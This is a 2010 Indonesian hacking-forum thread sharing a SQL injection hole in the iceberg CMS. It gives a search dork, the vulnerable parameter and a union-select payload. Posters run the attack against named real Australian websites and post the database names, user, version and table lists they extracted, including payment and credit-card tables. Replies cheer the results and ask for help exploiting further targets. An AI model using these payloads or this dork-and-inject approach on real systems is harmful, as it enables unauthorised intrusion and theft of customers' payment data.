[Bug]SQL injection pada iceberg 'Content Management System'

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
User avatar
poni
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia
Contact:

[Bug]SQL injection pada iceberg 'Content Management System'

Post by poni » Thu May 27, 2010 8:09 pm

The iceberg 'Content Management System' SQL Injection Vulnerability
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : by cyberlog
Published : 27.05.2010
Affected Software : imagetraders:iceberg_cms

==========================================================
The iceberg 'Content Management System' SQL Injection Vulnerability
==========================================================

# The iceberg 'Content Management System' SQL Injection Vulnerability
# Homepage : http://www.imagetraders.com.au
# Discovered : by cyberlog
# Dork : details.php?p_id= 'Design & SEO by Image Traders Pty Ltd'
# Exploit : http://[target]/details.php?p_id=[SQL Injection]
# Thanks : r0073r,adhietslank, k1n9k0ng, cr4wl3r,cah_gemblunkz,

jayoes,thesims,setiawan,irvian,EA_Angel,BlueSpy,SoEy,A-technique,Jantap,KiL
L SarifJedul,wiro gendeng,Letjen,ridho_bugs,Ryan
Kabrutz,Mathewsa.k.a Nyubicrew
# My Site : http://sekuritionline.net
# Channel : #sekuritionline
#special to Mama Sri Rahayu, Member& Staff Sekuritonline, C0li a.k.a
antisecurity [ pinjem script perl-na ] :),
Inj3ct0r Now Brothers with Sekuritionline
==============================================
We never die !!!! indonesian Underground Community
KacrUt I L0v3 U :P
Give me NOCAN Brothers :P
am nt hacker just Lik3 Syst3m S3curity

References :
http://xforce.iss.net/xforce/xfdb/58617
http://www.vupen.com/english/advisories/2010/1161
http://www.osvdb.org/64694
http://www.exploit-db.com/exploits/12620
http://secunia.com/advisories/39833
http://packetstormsecurity.org/1005-exp ... rg-sql.txt
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001

User avatar
baidhowi
Posts: 9
Joined: Fri Mar 16, 2007 9:27 pm
Location: Jakarta
Contact:

Re: [Bug]SQL injection pada iceberg 'Content Management Syst

Post by baidhowi » Thu May 27, 2010 8:18 pm

idih bang poni emg kga ada matinya daah :love:

thanks pak

User avatar
poni
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia
Contact:

Re: [Bug]SQL injection pada iceberg 'Content Management Syst

Post by poni » Thu May 27, 2010 8:21 pm

Diatas adalah salah satu bug sql injection yang ditemukan oleh cyberlog dari forum saudara kita sekuritionline, pada produk CMS imagetrader milik iceberg. sebagai POC, mari lihat web dibawah ini:

Image

Code: Select all

http://www.wielandhelicopters.com.au/details.php?p_id=62'
dan setelah dicek, ditemukan:

Code: Select all

database = wiehel1_wielandhelicopters0com0au

dan terdiri dari tabel
e_c 	
e_cc 	
e_answer 	
e_account_payment 	
db_backup 	
cover 	
cost_title 	
cost_sub_title 	
cost_detail 	
content_template 	
content_option 	
content_config 	
contact_thank 	
contact_show 	
contact_paragraph 	
contact_page 	
contact_location 	
contact_field 	
contact 	
colour_font_help 	
cms_user_type 	
cms_user_group 	
cms_plugin_option 	
cms_plugin 	
client_secondary 	
client_pdf_folder 	
client_pdf 	
client_note 	
client_image 	
client_file 	
client_enquiry 	
client_category_email 	
client_category 	
client 	
cli_enquiry_answer 	
cli_enquiry 	
cart_product 	
cart_payment_type 	
cart_payment_paypal 	
cart_payment_cc 	
cart_payment_bankdep 	
cart_payment 	
cart_option 	
cart_history 	
cart_config 	
cart 	
calendar_users 	
calendar_property 	
calendar_param 	
calendar_link 	
calendar_info_day 	
calendar_info 	
calendar_events 	
calendar_content 	
calendar_cat 	
business_location 	
booking_travellers 	
booking_package 	
booking_note 	
booking_meal 	
booking_item 	
booking_files 	
booking_fees 	
booking_email 	
booking 	
bo_paragraph 	
bo_help_plugin_paragraph 	
bo_help_option_paragraph 	
banner_image 	
banner 	
as_group 	
as_field 	
as_answer 	
agents 	
Selanjutnya silahkan anda pelajari sendiri.
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001

User avatar
shinichi81
Posts: 137
Joined: Tue Jan 19, 2010 6:25 pm
Location: Bandung Van Java

Re: [Bug]SQL injection pada iceberg 'Content Management Syst

Post by shinichi81 » Thu May 27, 2010 10:39 pm

Injin dipelajari Kk poni........
............make a wish............

User avatar
3xtr3m3b0y
Posts: 317
Joined: Wed Apr 22, 2009 5:11 pm
Location: ~[Hacked Machine]~
Contact:

Re: [Bug]SQL injection pada iceberg 'Content Management Syst

Post by 3xtr3m3b0y » Fri May 28, 2010 7:04 am

poni wrote: dan setelah dicek, ditemukan:

Code: Select all

database = wiehel1_wielandhelicopters0com0au

dan terdiri dari tabel	
cart_product 	
cart_payment_type 	
cart_payment_paypal 	
cart_payment_cc 	
cart_payment_bankdep 	
cart_payment 	
cart_option 	
cart_history 	
cart_config 		
Oh tidaaakkk... :pusing:
Ya Tuhan kuatkanlah hatiku... :cry:
Nice share Master PONI... :love:
...n0 l1m17...

User avatar
peniru
Posts: 389
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar
Contact:

Re: [Bug]SQL injection pada iceberg 'Content Management Syst

Post by peniru » Fri May 28, 2010 2:05 pm

mantap kk, ijin eksplorasi :love: :love:
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]

User avatar
peniru
Posts: 389
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar
Contact:

Re: [Bug]SQL injection pada iceberg 'Content Management Syst

Post by peniru » Fri May 28, 2010 2:57 pm

ane baru dapet kek bgini....
http://www.target.com.au/details.php?p_id=269 order by 1-- (no error)
tp kalo gini
http://www.target.com.au/details.php?p_id=269 order by 2-- (kok error yah)

mohon pencerahannya :mati: :mati:
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]

User avatar
iwan
Posts: 7
Joined: Sat Oct 15, 2005 6:49 pm
Location: Depok
Contact:

Re: [Bug]SQL injection pada iceberg 'Content Management Syst

Post by iwan » Fri May 28, 2010 3:00 pm

santapan lezattttt.. :tapa: :tapa:

huwahahaha.. :ngakak: :ngakak:

User avatar
peniru
Posts: 389
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar
Contact:

Re: [Bug]SQL injection pada iceberg 'Content Management Syst

Post by peniru » Fri May 28, 2010 3:37 pm

hwa akhirna berhasil nemu satu.... hanya dengan memperhatikan jenis error saja jumlah colom bisa ketemu :devil :devil

Code: Select all

URL:http://www.imagetraders.com.au/details.php?p_id=-1+union+all+select+1,darkc0de,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
[+] Evasion Used: "+" "--"
[+] 15:32:20
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
	Database: imatra_imagetraders0com0au
	User: imatra_cms@localhost
	Version: 5.0.90-community
CMIIW :love: :love:
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]

User avatar
abit doang
Posts: 212
Joined: Wed Mar 19, 2008 3:51 pm
Location: cd ../
Contact:

Re: [Bug]SQL injection pada iceberg 'Content Management Syst

Post by abit doang » Sat May 29, 2010 8:56 pm

nice,...
hajar pake fuzz aja ah,..
maklum nubi...
:tapa:
Yaa ALLAH, kayakanlah kami semua, agar kami dapat berbagi lebih banyak lagi :)
dan berilah kepada kami, jodoh yg terbaik dari sisiMU.
aamiin.. :D

http://abid912.wordpress.com/
http://maniak-online.blogspot.com/

Post Reply

Return to “Web Hacking”